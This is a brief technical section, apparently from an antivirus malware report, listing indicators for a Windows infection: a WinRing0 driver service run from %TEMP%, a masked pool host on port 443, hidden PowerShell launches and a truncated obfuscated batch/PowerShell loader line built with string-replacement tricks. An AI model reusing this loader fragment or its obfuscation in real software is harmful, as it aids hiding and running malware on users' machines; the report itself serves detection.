Техническая информация
- [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%TEMP%\lxvobfihqdgq.sys'
- 'WinRing0_1_2_0' %TEMP%\lxvobfihqdgq.sys
- %WINDIR%\explorer.exe
- %TEMP%\lxvobfihqdgq.sys
- %WINDIR%\temp\udd60be.tmp
- 'po##.#ashvault.pro':443
- 'po##.#ashvault.pro':443
- DNS ASK po##.#ashvault.pro
- '<SYSTEM32>\cmd.exe' /K <PATH_SAMPLE>.bat
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $host.UI.RawUI.WindowTitle='<PATH_SAMPLE>.bat';$thMl='ElVvdTemVvdTeVvdTntVvdTAtVvdT'.Replace('VvdT', ''),'CEHJyhaEHJyngeEHJyExEHJyteEHJynEHJysioEHJynEHJy'.Replace('EHJy', ''),'De...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden
- '%WINDIR%\explorer.exe'